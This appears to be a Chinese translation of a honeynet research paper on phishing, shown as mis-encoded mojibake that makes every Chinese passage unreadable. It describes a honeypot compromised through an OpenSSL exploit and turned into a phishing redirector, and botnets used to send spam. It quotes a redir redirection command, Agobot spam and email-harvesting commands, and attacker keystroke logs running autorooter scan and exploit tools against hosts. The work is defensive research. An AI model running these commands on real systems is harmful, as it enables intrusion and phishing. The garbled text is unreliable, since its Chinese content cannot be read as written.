ÔÚ 2004 Äê 11 Ô½£¬µÂ¹úÃÛÍøÏîÄ¿×鲿ÊðÁ˰üº¬Ò»¸ö Redhat Linux 7.3 Ã۹޵ľµä µÚ¶þ´úÃÛÍø¡£ËäÈ»°²×°µÄÊÇÏ൱¾ÉµÄ²Ù×÷ϵͳ°æ±¾£¬¹¥»÷ÕßÒ²Äܹ»·Ç³£ÈÝÒ×¾ÍÄܹ¥ÆÆ£¬µ«ËüÁîÈ˾ªÑȵؾ¹ýÁËÁ½¸ö°ëÔºó²Å±»Ê״γɹ¦¹¥ÏÝ£ÕâºÍÒÔÉÏÌá¼°°¸ÀýÖÐÌÖÂÛµÄÃÛ¹Þ¿ìËÙ±»¹¥ÏݵÄÇé¿öÐγÉÏÔÖøµÄ·´²î¡£¸ü¶à¹ØÓÚ´ËÇ÷ÊÆµÄÐÅÏ¢¿ÉÒÔÔÚ¡°Á˽âÄãµÄµÐÈË¡±ÏµÁÐÎÄÕÂÖеġ° Á˽âÄãµÄµÐÈË£ºÇ÷ÊÆ·ÖÎö ¡±ÖпÉÒÔÕÒµ½¡£
ÔÚ 2005 Äê 1 Ô 11 ÈÕ £¬Ò»¸ö¹¥»÷Õ߳ɹ¦µØ¹¥ÏÝÁËÕą̂ÃÛ¹Þ£¬Ê¹ÓÃÁËÕë¶Ô Redhat Linux 7.3 ȱʡ°²×°´æÔÚµÄ OpenSSL SSLv2 Malformed Client Key Remote Buffer Overflow Vulnerability µÄ¹¥»÷½Å±¾¡£´Ë°¸Àý²»Ñ°³£µÄÊǵ±¹¥»÷Õß»ñµÃ±»¹¥ÏÝÖ÷»úµÄ·ÃÎÊȨºó£¬Ëû²¢Ã»ÓÐÖ±½ÓÉÏ´«µöÓãÍøÕ¾ÄÚÈÝ¡£È¡¶ø´úÖ®µÄÊÇ£¬¹¥»÷ÕßÔÚÃÛ¹ÞÉϰ²×°²¢ÅäÖÃÁËÒ»¸ö¶Ë¿ÚÖØ¶¨Ïò·þÎñ¡£
Õâ¸ö¶Ë¿ÚÖØ¶¨Ïò·þÎñ±»Éè¼Æ³É½«·¢Íù¸ÃÃÛ¹ÞÍøÕ¾·þÎñÆ÷µÄ HTTP ÇëÇóÒÔ͸Ã÷µÄ·½Ê½ÖØÐ·Óɵ½ÁíÍâÒ»¸öÔ¶³ÌµÄÍøÕ¾·þÎñÆ÷£¬ÕâÖÖ·½Ê½Ç±ÔÚµØÊ¹µÃ¶ÔµöÓãÍøÕ¾ÄÚÈݸüÄÑ×·×Ù¡£¹¥»÷ÕßÏÂÔØ²¢ÔÚÃÛ¹ÞÉϰ²×°ÁËÒ»¸ö³ÆÎª redir µÄ¹¤¾ß£¬´Ë¹¤¾ßÊÇÒ»¸öÄܹ»Í¸Ã÷µØ½«Á¬ÈëµÄ TCP Á¬½Óת·¢µ½Ò»¸öÔ¶³ÌµÄÄ¿±êÖ÷»úµÄ¶Ë¿Ú ÖØ¶¨ÏòÆ÷¡£Ôڴ˴ΰ¸ÀýÖУ¬¹¥»÷ÕßÅäÖøù¤¾ß½«ËùÓе½ÃÛ¹Þ TCP 80 ¶Ë¿Ú£¨ HTTP £©µÄÁ÷Á¿Öض¨Ïòµ½Ò»¸öλÓÚ Öйú µÄÔ¶³ÌÍøÕ¾·þÎñÆ÷µÄ TCP 80 ¶Ë¿Ú¡£ÓÐÒâ˼µÄÊÇ£¬¹¥»÷Õß²¢Ã»ÓÐÔÚÃÛ¹ÞÉϰ²×° Rootkit ÒÔÒþ²ØËûµÄ´æÔÚ£¬ÕâҲ˵Ã÷¹¥»÷Õß²¢Ã»Óаѱ»¹¥ÏݵÄÖ÷»úµÄ¼ÛÖµ¿´µÄºÜÖØ£¬Í¬Ê±²¢²»µ£Ðı»¼ì²âµ½¡£
¹¥»÷ÕßʹÓõĽ¨Á¢¶Ë¿ÚÖØ¶¨ÏòµÄÖ¸ÁîÈçÏ£º
redir --lport=80 --laddr=
ÁíÍ⣬¹¥»÷ÕßÐÞ¸ÄÁË Linux ϵͳµÄÆô¶¯½Å±¾Îļþ /etc/rc.d/rc.local ´Ó¶ø±£Ö¤ redir ¶Ë¿ÚÖØ¶¨Ïò·þÎñÔÚÃÛ¹ÞÏµÍ³ÖØÐÂÆô¶¯ºóÒ²»á±»ÖØÐÂÆô¶¯£¬Ìá¸ßÁËËûÃǵĶ˿ÚÖØ¶¨Ïò·þÎñµÄÉú´æÄÜÁ¦¡£È»ºóËûÃÇ¿ªÊ¼ÍùÍâ·¢Ë͵öÓãÀ¬»øÓʼþÒÔÒýÓÕÊܺ¦Õß·ÃÎÊ´ËÃÛ¹Þ£¬Ò»¸öʾÀý¿ÉÒÔÔÚ ´Ë ÕÒµ½¡££¨×¢ÒâÏà¹ØµÄÃô¸ÐÐÅÏ¢ÒѾ±»»ìÏýÁË£©¡£
ΪÁ˽øÒ»²½µ÷²é¹¥»÷ÕߵĻ£¬µÂ¹úÃÛÍøÏîÄ¿×éµÄ³ÉÔ±ÃǸÉÉæ²¢ÍµÍµÃþÃþÐÞ¸ÄÁ˹¥»÷ÕßÔÚÃÛ¹ÞÉϰ²×°µÄ redire ¹¤¾ßµÄÅäÖã¬Ê¹ÆäÔÚ redir ³ÌÐòÄÚ½øÐÐÈÕÖ¾£¬Ê¹µÃ¸üÈÝÒ׵ع۲쵽¶àÉÙÈ˽ÓÊÕµ½´ËÀ¬»øÓʼþÐÅÏ¢£¬²¢µã»÷ÁËÆäÖеÄÁ´½Ó͸Ã÷µØ·ÃÎÊÖØ¶¨ÏòºóµÄµöÓãÍøÕ¾ÄÚÈÝ¡£ÔÚ½«½ü 36 СʱµÄʱ¼ä¶ÎÄÚ£¬ 721 ¸ö IP µØÖ·±» redir ÖØ¶¨Ïòµ½µöÓãÍøÕ¾£¬ÎÒÃÇÓÖÒ»´Î¶ÔÕâô¶àÓû§±»·¢²¼µÄµöÓãÓʼþËùÒýÓÕ·ÃÎʵöÓãÍøÕ¾ÄÚÈݶø¸Ðµ½Õ𾪡£¶Ô·ÃÎʶ˿ÚÖØ¶¨ÏòÆ÷µÄ IP µØÖ·µÄ·ÖÎö¿ÉÒÔÔÚ ÕâÕÒµ½£¨×¢ÒâÕâЩÐÅÏ¢ÒѾ±»Çå½à¹ý£¬ÒÔ±£»¤·ÃÎʵöÓãÍøÕ¾µÄÓû§£¬Í¬Ê±ÔÚÎÒÃǵÄÑо¿Öнö¼Ç¼ÁË IP µØÖ·Êý¾Ý£¬ÈκλúÃÜÐÔµÄÓû§Êý¾ÝûÓб»²¶»ñ£©¡£
±¾´Î¹¥»÷°¸ÀýµÄÒ»¸ö¸ÅҪʱ¼äÏßÈçϱíËùʾ£º
ÈÕÆÚ / ʱ¼ä
ʼþ
2004 Äê 11 ÔÂ 1 ÈÕ
ÃÛ¹ÞÊܵ½Ê×´ÎɨÃè
2005 Äê 1 ÔÂ 11 ÈÕ 19:13
ÃÛ¹ÞÉ쵀 OpenSSL ·þÎñ±»¹¥ÏÝ£¬¶Ë¿ÚÖØ¶¨ÏòÆ÷±»°²×°£¬ µöÓãÀ¬»øÓʼþ ±»·¢ËÍ¡£
2005 Äê 1 ÔÂ 11 ÈÕ 20:07
¶ÔµöÓãÍøÕ¾ÄÚÈÝµÄ ÍøÒ³ÇëÇó ¿ªÊ¼µ½´ïÃÛ¹Þ¡£
2005 Äê 1 ÔÂ 13 ÈÕ 8:15
ÃÛ¹Þ±»ÀëÏß½øÐÐȡ֤·ÖÎö¡£
µÚÈýÖÖÍøÂçµöÓã¼¼Êõ£Í¨¹ý½©Ê¬ÍøÂç½øÐеöÓã
ÃÛÍøÏîÄ¿×é×î½ü·¢²¼µÄһƪÎÄÕ¡° Á˽âÄãµÄµÐÈË£º¸ú×Ù ½©Ê¬ÍøÂç ¡±½éÉÜÁËÒ»ÖÖ×·×Ù½©Ê¬ÍøÂçµÄ·½·¨¡£Ò»¸ö½©Ê¬ÍøÂçÊÇÓɿɱ»¹¥»÷ÕßÔ¶³Ì¿ØÖƵı»¹¥ÏÝÖ÷»úËù¹¹³ÉµÄÍøÂç¡£ÓÉÓÚËûÃǵľ޴óÊýÁ¿£¨¿ÉÒÔÓгÉǧÉÏÍòµÄÖ÷»úÒ»ÆðÁ¬½Ó£©£¬µ±½©Ê¬ÍøÂç±»ÓÃÒÔ·Ö²¼Ê½¾Ü¾ø·þÎñ¹¥»÷ʱ£¬¿ÉÒÔ¶Ô»¥ÁªÍøÉçÇø¹¹³É¾Þ´óµÄÍþв¡£ÔÚ 2004 Äê 10 ÔµÄÒ»´Îµ÷²éÖУ¬µç×ÓÓʼþ°²È«¹«Ë¾ CipherTrust µÃ³öÁË 70% ¼àÊÓµ½µÄµöÓãÀ¬»øÓʼþÊÇ´Ó 5 ¸ö»îÔ¾µÄ½©Ê¬ÍøÂçÖÐµÄ 1 ¸öËù·¢³öµÄ£¬µ«ÊÇÎÒÃǵĹ۲ìÏÔʾÓиü¶àµÄ½©Ê¬ÍøÂçÒѾ±»ÓÃÀ´½øÐз¢ËÍÀ¬»øÓʼþ¡£¾¡¹Ü»¹Ã»ÓÐÒ»¸öÏÔÖøµÄʵ¼Ê°¸Àý·ÖÎö£¬ÔÚ±¾½ÚÖÐÎÒÃÇ»¹ÊǸø³öÁËÎÒÃǶԿɱ»¹¥»÷ÕßÒÔ½©Ê¬ÍøÂçµÄ·½Ê½½øÐÐÍøÂçµöÓã¹¥»÷µÄ¹¤¾ßºÍ¼¼ÊõµÄ¹Û²ì½á¹û¡£
°¸Àýʱ¼ä±í
ÔÚ´Ó 2004 Äê 9 Ôµ½ 2005 Äê 1 ÔµÄÕâ¶ÎʱÆÚÖУ¬µÂ¹úÃÛÍøÏîÄ¿×鲿ÊðÁËһϵÁа²×°Î´´ò²¹¶¡µÄ΢Èí Windows ²Ù×÷ϵͳµÄÃÛ¹Þ£¬ÒÔ¹Û²ì½©Ê¬ÍøÂç»î¶¯¡£ÎÒÃÇ¿ª·¢ÁËÒ»¸ö×Ô¶¯»¯²¿ÊðµÄ¹ý³Ì£¬Ê¹µÃÃÛ¹Þ¿ÉÒÔ±»Öظ´ÐԵز¿Ê𣬹¥Ïݼ°ÀëÏß·ÖÎö¡£ÔÚ´ËÆÚ¼ä£¬³¬¹ý 100 ¸ö²»Í¬µÄ½©Ê¬ÍøÂç±»·¢ÏÖ£¬ÒÔ¼°ÉÏǧµÄÎļþ±»»ñÈ¡ÓÃÒÔÀëÏß·ÖÎö¡£
·ÖÎö
һЩÔÚ´ËÑо¿ÏîÄ¿Öв¶»ñµÄ½©Ê¬¹¤¾ßÌṩÁËÔÚ±»¹¥ÏÝÖ÷»úÉÏÔ¶³ÌÆô¶¯Ò»¸ö SOCKS v4/v5 ´úÀíµÄÄÜÁ¦¡£ SOCKS Ϊ»ùÓÚ TCP /IP µÄÍøÂçÓ¦ÓóÌÐòÌṩÁËÒ»ÖÖͨÓû¯µÄ´úÀí»úÖÆ£¨ RFC 1928 £©£¬¿ÉÒÔ±»ÓÃÀ´´úÀí×îÆÕ±éµÄ»¥ÁªÍøÁ÷Á¿£¬Èç HTTP ºÍ SMTP µÈ¡£Èç¹û¹¥»÷ÕßÄܹ»³É¹¦µØÍ¨¹ý½©Ê¬ÍøÂçµÄ¿ØÖÆÊ¹µÃ¸÷¸öÔ¶³Ì¿þÀÜÖ÷»úÉ϶¼¿ª·Å SOCKS ´úÀí·þÎñ¹¦ÄÜ£¬ÄÇô¸ÃÖ÷»ú¿ÉÒÔ±»ÓÃÀ´·¢ËÍ´óÁ¿µÄÀ¬»øÓʼþ£¬Èç¹û½©Ê¬ÍøÂçÖаüº¬³ÉǧÉÏÍòµÄ¿þÀÜÖ÷»ú£¬ÄÇô¹¥»÷Õß¿ÉÒÔÇáÒ׵ط¢Ë;޴óÊýÁ¿µÄÀ¬»øÓʼþ£¬¶øÕâЩÀ¬»øÓʼþµÄ·¢ËÍÔ´Í·È´ÊǸ²¸Ç¾Þ´ó IP µØÖ··¶Î§µÄÊôÓÚһЩÎ޽䱸ÐÄÓû§µÄ¼ÒÍ¥ PC »ú¡£
²»´æÔÚ¼¯ÖеĿØÖƵ㣬ÒÔ¼°Æä·¶Î§³¬³öÁ˹ú½çʹµÃºÜÄѶԽ©Ê¬ÍøÂçµÄ»î¶¯½øÐÐ×·×ÙºÍ×è¶Ï¡£ÕâҲʹµÃ½©Ê¬ÍøÂçΪÀ¬»øÓʼþ·¢²¼Õߺ͵öÓãÕßÌṩÁËÒ»ÖֵͷçÏյġ¢µ«¸ß»Ø±¨µÄ¹¥»÷·½·¨¡£»òÐí²»»áÁîÈ˾ªÑÈ£¬¸»ÓпþÀÜ×ÊÔ´µÄ½©Ê¬ÍøÂçÓµÓÐÕßÒѾ¿ªÊ¼ÒÔ·¸×ïΪĿ±ê£¬²¢ÇÒĿǰҲÒѾ³öÏÖ ×â½è ½©Ê¬ÍøÂçµÄÏÖÏó¡£ÎªÁË׬ȡ×â½ð£¬½©Ê¬ÍøÂçµÄ²Ù×÷Õß½«»á¸øËûµÄ¿Í»§Ìṩһ¸öÖ§³Ö SOCKS v4 µÄ·þÎñÆ÷ IP µØÖ·ºÍ¶Ë¿Ú¡£ÒѾÓб¨µÀÏÔʾ½©Ê¬ÍøÂç±»³öÊÛ¸øÀ¬»øÓʼþ·¢²¼Õß×÷ΪÀ¬»øÓʼþµÄת·¢·þÎñÆ÷¡£ " Uncovered: Trojans as Spam Robots ". һЩ²¶»ñµÄ½©Ê¬¹¤¾ßҲʵÏÖÁËÄܹ»»ñÈ¡ Email µØÖ·£¬»òÕßͨ¹ý¿þÀÜÖ÷»ú·¢ËÍÀ¬»øÓʼþµÄÌØÊ⹦ÄÜ¡£ÏÂÃæµÄÁбíÏÔʾÁËһЩÔÚ Agobot £¨Ò»¸ö±»¹¥»÷Õ߷dz£ÆÕ±éʹÓõĽ©Ê¬¹¤¾ß£¬Æä±äÖÖÒ²¾³£ÔÚÎÒÃǵÄÑо¿¹ý³ÌÖб»²¶»ñ£©ÖÐʵÏÖµÄÓëÀ¬»øÓʼþ / µöÓãÓʼþÏà¹ØµÄÖ¸Á
harvest.emails ¨C ʹµÃ½©Ê¬¹¤¾ß»ñµÃÒ»¸ö Email µØÖ·Áбí
harvest.emailshttp ¨C ʹµÃ½©Ê¬¹¤¾ßͨ¹ý HTTP »ñµÃÒ»¸ö Email µØÖ·Áбí
spam .setlist ¨C ÏÂÔØÒ»¸ö Email µØÖ·Áбí
spam .settemplate ¨C ÏÂÔØÒ»¸ö Email Ä£°å
spam .start ¨C ¿ªÊ¼·¢ËÍÀ¬»øÓʼþ
spam .stop ¨C Í£Ö¹·¢ËÍÀ¬»øÓʼþ
aol spam .setlist - AOL - ÏÂÔØÒ»¸ö Email µØÖ·Áбí
aolspam.settemplate - AOL - ÏÂÔØÒ»¸ö Email Ä£°å
aol spam .setuser - AOL ¨C ÉèÖÃÓû§Ãû
aol spam .setpass - AOL £ÉèÖÿÚÁî
aol spam .start - "AOL - ¿ªÊ¼·¢ËÍÀ¬»øÓʼþ
aol spam .stop - "AOL - Í£Ö¹·¢ËÍÀ¬»øÓʼþ
¹ØÓÚÕâЩָÁîʵÏֵĽøÒ»²½ÐÅÏ¢£¬¿ÉÒÔÔÚÕâÕÒµ½£¬ÒÔ½©Ê¬¹¤¾ßÔ´ÂëµÄ×¢ÊÍÐÎʽ¸ø³ö¡£ÔÚ drone £Ò»¸öÓɵ¹úÃÛÍøÏîÄ¿×鿪·¢µÄ×Ô¶¨ÖÆ IRC ¿Í»§¶ËµÄ°ïÖúÏ£¬Í¨¹ýÀûÓÃÎÒÃǵÄÃÛÍøËù²¶»ñµÄÍøÂçÁ¬½ÓÊý¾Ý½« drone »ìÈë½©Ê¬ÍøÂçÖУ¬ÎÒÃÇ¿ÉÒÔ¶Ô½©Ê¬ÍøÂçÈçºÎ±»ÓÃÒÔ½øÐз¢ËÍÀ¬»øÓʼþ / µöÓãÓʼþ½øÐиüÉîÈëµÄÁ˽⡣ÒÔϽ«¸ø³öһЩ¹Û²ìµ½µÄµäÐͻ°¸Àý¡£
ʵÀý 1
ÔÚÒ»¸öÌØ¶¨µÄ½©Ê¬ÍøÂçÖУ¬ÎÒÃǹ۲쵽¹¥»÷Õß·¢³öÁËÒÔÏÂÖ¸ÁעÒâ URL ¶¼ÒѾ±»»ìÏýÁË£©£º
.mm (mass emailing) Ö¸ÁîÊÇÒ»¸öÒ»°ã»¯µÄ spam_start Ö¸ÁîµÄ¶¨Öư汾¡£Õâ¸öÖ¸Áî½ÓÊÕÒÔÏ 4 ¸ö²ÎÊý£º
Ò»¸ö°üº¬¶à¸ö Email µØÖ·ÎļþµÄ URL
°üº¬ÔÚÀ¬»øÓʼþÖеÄÄ¿±êÍøÕ¾µØÖ·Á´½Ó£Õâ¸öÍøÕ¾¿ÉÄÜÊÇÒ»¸öÆÕ±éµÄÀ¬»øÍøÒ³£¬Ò²¿ÉÄÜÊÇÒ»¸öµöÓãÍøÕ¾
·¢ËÍÕßµÄÃû×Ö
ÓʼþµÄÖ÷Ìâ
ÔÚ±¾´Î¹¥»÷°¸ÀýÖУ¬Ã¿´Îµ÷Óà fetch.php ½Å±¾»á·µ»Ø 30 ¸ö²»Í¬µÄ Email µØÖ·¡£¶ÔÓÚÿ¸öÊÕÐÅÕߣ¬½«»á¹¹ÔìÒ»¸ö Email Óʼþ£¬½«Ðû´«Ö¸ÁîÖеڶþ¸ö²ÎÊý¸ø³öµÄÁ´½Ó¡£ÔÚÕâ¸öʵÀýÖУ¬µÚ¶þ¸ö²ÎÊýµÄÁ´½ÓÖ¸ÏòÁËÒ»¸öÆóͼÔÚÊܺ¦ÕßÖ÷»úÉϰ²×°Ò»¸ö¶ñÒâ ActiveX ×é¼þµÄÍøÒ³¡£
ʵÀý 2
ÔÚÁíÒ»¸ö½©Ê¬ÍøÂçÖУ¬ÎÒÃǹ۲쵽ÔÚÊܺ¦Õß PC Éϰ²×°ä¯ÀÀÆ÷ÖúÊÖ×é¼þµÄ¹¥»÷·½Ê½£º
[TOPIC] # spam 9 :.open http://amateur.example.com/l33tag3/beta.html -s
.open Ö¸Áî¸æËßÿ¸ö½©Ê¬¹¤¾ß´ò¿ªËùÉêÇëµÄÍøÒ³²¢ÏÔʾ¸øÊܺ¦Õߣ¬ÔÚÕâ¸ö°¸ÀýÖУ¬Õâ¸öÍøÒ³Öаüº¬Ò»¸öä¯ÀÀÆ÷ÖúÊÖ×é¼þ£¬ÆóͼÔÚÊܺ¦ÕßÖ÷»úÉϰ²×°×ÔÉí¡£´ÓÕâ¸ö IRC ƵµÀµÄÃû³Æ¿ÉÒÔÏÔʾ³ö£¬Õâ¸ö½©Ê¬ÍøÂçÒ²ÊÇÓÃÒÔ·¢ËÍÀ¬»øÓʼþµÄ¡£
ʵÀý 3
ÔÚÁíÍâÒ»¸ö½©Ê¬ÍøÂçÉÏ£¬ÎÒÃǹ۲쵽 spyware ´«²¥µÄʵÀý£º
http://public.example.com/prompt.php?h=6d799fbeef 3a 9b 386587f 5f 7b 37f [...]
Õâ¸öÁ´½ÓÔÚ¶Ô²¶»ñµ½µÄ¶ñÒâÈí¼þµÄ·ÖÎöÖлñµÃ£¬Ëü½«Êܺ¦ÕßÖ¸ÏòÁËÒ»¸öÌṩ¡°Ãâ·ÑµÄ¹ã¸æ´«²¥Èí¼þ¡±µÄ¹«Ë¾µÄÍøÒ³£¬Õâ¸öÍøÕ¾°üº¬ÁËÔÚÆóͼ·ÃÎʿͻ§¶ËÉϰ²×° ActiveX ×é¼þ£¨ÍƲâÊÇ adware »ò spyware £©µÄ¶à¸öÒ³Ãæ¡£
ÆÕ±éµÄ¹¥»÷ÐýÂÉ
ÔÚÎÒÃǶÔÍøÂçµöÓã¹¥»÷µÄÑо¿¹ý³ÌÖз¢ÏÖÁËһЩÆÕ±éµÄ¹¥»÷ÐýÂÉ£¬¹¥»÷ÕßÏÔÈ»ÔÚ»ìºÏʹÓÃһЩ¹¤¾ßºÍ¼¼ÊõÀ´Ìá¸ßËûÃdzɹ¦µÄ»ú»á¡£ÎÒÃÇÏÖÔÚ¿ªÊ¼·ÖÎöÁ½ÖÖÕâÑùµÄ¼¼Êõ£ÅúÁ¿É¨ÃèºÍ×éºÏʽ¹¥»÷¡£
ÅúÁ¿É¨Ãè
ͨ¹ý¶ÔһЩ±»¹¥ÏÝÃ۹޵ķÖÎö±íÃ÷£¬ÏµÍ³ÊÇ×Ô¶¯»¯µÄ¹¥»÷½Å±¾Ëù¹¥ÏÝ£¬ÕâЩ×Ô¶¯»¯¹¥»÷½Å±¾Í¨³£±»³ÆÎª autorooters ¡£ÔÚÉÏÃæÃèÊöµÄÁ½¸ö°¸ÀýÖУ¬Ò»µ©¹¥»÷Õß¹¥ÏÝÁËÃÛ¹Þ£¬ autorooter µÄ toolkits ¾Í±»ÉÏ´«µ½·þÎñÆ÷ÉÏ£¬È»ºó¹¥»÷Õ߾ͿªÊ¼³¢ÊÔɨÃèһЩ IP µØÖ·¿Õ¼ä¶ÎÀ´Ñ°ÕÒÆäËûͬÑù´æÔÚ©¶´µÄ·þÎñÆ÷£¨Ôڵ¹ú°¸ÀýÖÐʹÓõijÆÎª superwu µÄɨÃèÆ÷£¬¶øÔÚÓ¢¹ú°¸ÀýÖÐʹÓÃÁË mole ɨÃèÆ÷£©¡£ÔÚÓ¢¹ú°¸ÀýÖв¶»ñµÄ¹¥»÷Õß¼ü»÷¼Ç¼ÈçÏÂËùʾ£¬ÏÔʾÁË´Ó±»¹¥ÏݵÄÃÛ¹Þ·¢ÆðµÄÅúÁ¿É¨ÃèµÄʵÀý¡£×¢ÒâÓÉÓÚÃÛÍøÅäÖã¬ÕâЩÍùÍâµÄ¶ñÒâÁ÷Á¿»á±»×è¶Ï£¬´Ó¶øÕâЩ¹¥»÷²»»á³É¹¦¡£
¹¥»÷Õß½âѹËõɨÃèÆ÷£¬²¢³¢ÊÔɨÃè B ÀàµØÖ·¿Õ¼ä¶Î£º
[2004-07-18 15:23:31 bash 0]tar zxvf mole.tgz
[2004-07-18 15:23:33 bash 0]cd mole
[2004-07-18 15:23:38 bash 0]./mazz 63.2
[2004-07-18 15:24:04 bash 0]./mazz 207.55
[2004-07-18 15:25:13 bash 0]./scan 80.82
»÷Õß³¢ÊÔ¹¥»÷DZÔÚµÄÓЩ¶´µÄ·þÎñÆ÷£º
[2004-07-19 11:56:46 bash 0]cd mole
[2004-07-19 11:56:50 bash 0]./root -b 0 -v ns1.victim.net
[2004-07-19 11:57:26 bash 0]./root -b 0 -v 66.90.NNN.NNNs
¹¥»÷ÕßÔÚÒ»¶Îʱ¼äºó»ØÀ´²é¿´ÒѾ³É¹¦¹¥ÏݵķþÎñÆ÷ÁÐ±í£¨Õâ¸öÁбíÊǿյģ¬ÓÉÓÚÃÛÍøµÄÅäÖã©£º
[2004-07-23 08:13:18 bash 0]cd mole
[2004-07-23 08:13:20 bash 0]ls
[2004-07-23 08:13:25 bash 0]cat hacked.servers
¹¥»÷Õß³¢ÊÔɨÃè¸ü¶àµÄ B ÀàµØÖ·¿Õ¼ä¶Î£¬²¢Ëæºó²âÊÔ¶ÔÑ¡ÔñÄ¿±ê½øÐй¥»÷£º
[2004-07-24 10:24:17 bash 0]cd mole
[2004-07-24 10:24:19 bash 0]./scan 140.130
[2004-07-24 10:24:27 bash 0]./scan 166.80
[2004-07-24 10:25:36 bash 0]./scan 166.4
[2004-07-24 10:26:23 bash 0]./scan 139.93
[2004-07-24 10:27:18 bash 0]./scan 133.200
[2004-07-24 10:36:37 bash 0]./try 202.98.XXX.XXX
[2004-07-24 10:38:17 bash 0]./try 202.98.YYY.YYY
[2004-07-24 10:38:27 bash 0]./try 202.98.YYY.YYY
ÔÚÉÏÊö×îºóÒ»¸öÀý×ÓÖУ¬×¢Òâ¹¥»÷Õß³¢ÊÔ¹¥ÏݵöÖ÷»ú²¢²»ÔÚ´ÓÕâ¸öÃÛ¹ÞɨÃèµÄ IP µØÖ··¶Î§ÄÚ£¬ÕâÓÖÒ»´ÎÌṩÁËÅúÁ¿É¨ÃèÐÐΪµÄ¸ßÐͬÐԺͲ¢ÐÐÐÔ¡£
¶ÔÓ¢¹ú¹¥»÷ÕßÏÂÔØµÄ mole .tgz ÎļþµÄ½øÒ»²½µ÷²é½ÒʾÁËÔÚ½âѹºóµÄ aotorooter toolkit µÄ¸ùĿ¼ÖÐÓÐһЩ text Îļþ¡£ÕâЩÎļþ°üÀ¨É¨ÃèÅäÖÃÐÅÏ¢ºÍ֮ǰɨÃè¡° grabbb2.x and samba 2.2.8 vulnerability ¡±µÄɨÃè½á¹ûÈÕÖ¾¡£ÔÚÕâЩÎļþÖл¹°üº¬ 42 ¸öÕë¶ÔÆäËûÖ÷»úµÄ¹¥»÷°¸Àý£¬ÒÔ¼°Õë¶Ô¶à¸ö B ÀàµØÖ·¿Õ¼äɨÃèµÄ½á¹û£¬´Ó¶øÖ¤Ã÷Á˹۲쵽µÄ¹¥»÷°¸ÀýÊÇÒ»¸ö¸ü´óµÄ¸ü¾ß×éÖ¯ÐÔµÄÕë¶ÔÀàËÆÏµÍ³µÄ¹¥»÷ÖеÄÒ»²¿·Ö¡£Ò»¸ö´Ó¹¥»÷ÕߵĽǶȲ鿴µÄ mole ɨÃ蹤¾ßµÄÊä³ö½á¹ûµÄʵÀý£¬¿ÉÒÔÔÚ Õâ ÕÒµ½¡£
×îºó£¬Ò»Ð©´Ó¹¥ÏÝÃÛ¹ÞÉÏ·¢ÏÖµÄÅúÁ¿É¨Ã蹤¾ß¿´ÆðÀ´²¢Ã»Óй㷺µØ´«²¥£¬ÕâÒ²ÏÔʾÁËÕâЩ¹¥»÷ÕßÓµÓг¬Ô½»ù±¾µÄ½Å±¾Ð¡×ÓµÄÒ»¶¨Ë®Æ½µÄ¿ª·¢ÄÜÁ¦ºÍ¹¤¾ßÖÆÔìÄÜÁ¦£¬»òÕßÊÇÒ»¸ö²¢Ã»Óн«ËûÃǵŤ¾ß¹²Ïí¸ø¹«¿ªÂÛ̳µÄ·â±ÕÉçÍŵijÉÔ±¡£ÓÖÒ»´Î£¬ÕâÏÔʾÁ˾ßÓÐÁ¼ºÃ×éÖ¯ÐԵĹ¥»÷ÕßµÄÄÜÁ¦¡£
×éºÏʽ¹¥»÷
ÔÚÎÒÃǵÄÑо¿ÖУ¬ÎÒÃÇÒ²·¢ÏÖÁ˵öÓãÕß¾³£×éºÏÈýÖÖ²»Í¬µÄ¹¥»÷¼¼Êõ¡£ÕýÈçÎÒÃǹ۲쵽£¬²¢ÔÚ±¾ÎÄËùÃèÊöµÄ£¬Ò»Ð©Ê±ºò¶àÖÖ·½·¨½«ÌṩһЩÈßÓàÐÔ£¬²¢Í¨¹ýÒ»¸öÁ½²ãµÄÍøÂçÍØÆËÅäÖñ£»¤ËûÃǵÄÍøÂçµöÓã¹¥»÷»ù´¡ÉèÖá£ÏÂͼÃèÊöÁËÒ»ÖÖ¿ÉÄܵÄÍøÂçµöÓã¹¥»÷ÍØÆË½á¹¹£º
ÔÚÕâ¸öʵÀýÖУ¬Ò»¸öÖÐÑëµÄÍøÕ¾·þÎñÆ÷¼ÜÉèÁËÎïÀíÉϵĵöÓãÍøÕ¾ÄÚÈÝ£¬Í¨³£°üº¬Õë¶Ô¶à¸öÄ¿±ê»ú¹¹µÄ¶à¸öÍøÕ¾£¨ÈçÔÚ /ebay Ŀ¼ÏÂÓÐ Ò»¸ö eBay µöÓãÍøÕ¾£¬ÔÚ .paypal Ŀ¼ÏÂÓÐÒ»¸ö PayPal µöÓãÍøÕ¾ £©¡£Ò»Ð©±»¹¥ÏݵÄÔ¶³ÌÖ÷»úÔÚ redir ¶Ë¿ÚÖØ¶¨ÏòÆ÷µÄ°ïÖúϽ«Á¬Èë TCP 80 ¶Ë¿ÚµÄ HTTP Á÷Á¿Öض¨Ïòµ½ÖÐÑëµÄÍøÕ¾·þÎñÆ÷¡£ÕâÖÖ·½°¸´Ó¹¥»÷ÕߵĽǶȿ´À´±ÈÒ»¸öµ¥Ò»µÄµöÓãÍøÕ¾ÓµÓÐÒÔϵÄһЩÓÅÊÆ£º
Èç¹ûһ̨Զ³ÌµÄ redir Ö÷»ú±»¼ì²âµ½ÁË£¬ÄÇôÊܺ¦Õß½«°ÑÕâ¸öϵͳÀëÏß²¢ÖØÐ°²×°£¬µ«Õâ²¢²»»á¶ÔµöÓãÕß¹¹³ÉºÜ´óµÄËðʧ£¬ÒòΪÖ÷µöÓãÍøÕ¾ÈÔÈ»ÔÚÏߣ¬¶øÇÒÆäËûµÄ redir Ö÷»úÈÔÈ»¿ÉÒÔ½« HTTP Á÷Á¿×ª·¢µ½ÖÐÑëÍøÕ¾·þÎñÆ÷¡£
Èç¹ûÖÐÑëµÄµöÓãÍøÕ¾·þÎñÆ÷±»¼ì²âµ½£¬Õâ¸öϵͳ½«±»ÀëÏߣ¬µ«µöÓãÕß¿ÉÒÔÔÚһ̨й¥ÏݵÄÖ÷»úÉÏÖØÐ¼ÜÉèµöÓãÍøÕ¾£¬²¢ÖØÐ½ÃÕýÔÏ鵀 redir Ö÷»úÖØ¶¨ÏòÁ÷Á¿µ½´úÌæµÄÖÐÑëÍøÕ¾·þÎñÆ÷¡£Ê¹ÓÃÕâÖÖ¼¼Êõ£¬Õû¸öÍøÂç¿ÉÒÔºÜ¿ìµØÖØÐ»ָ´¿ÉÓã¬ÍøÂçµöÓã¹¥»÷¿ÉÒÔ¿ìËÙµØÖØÐ¿ªÊ¼¡£
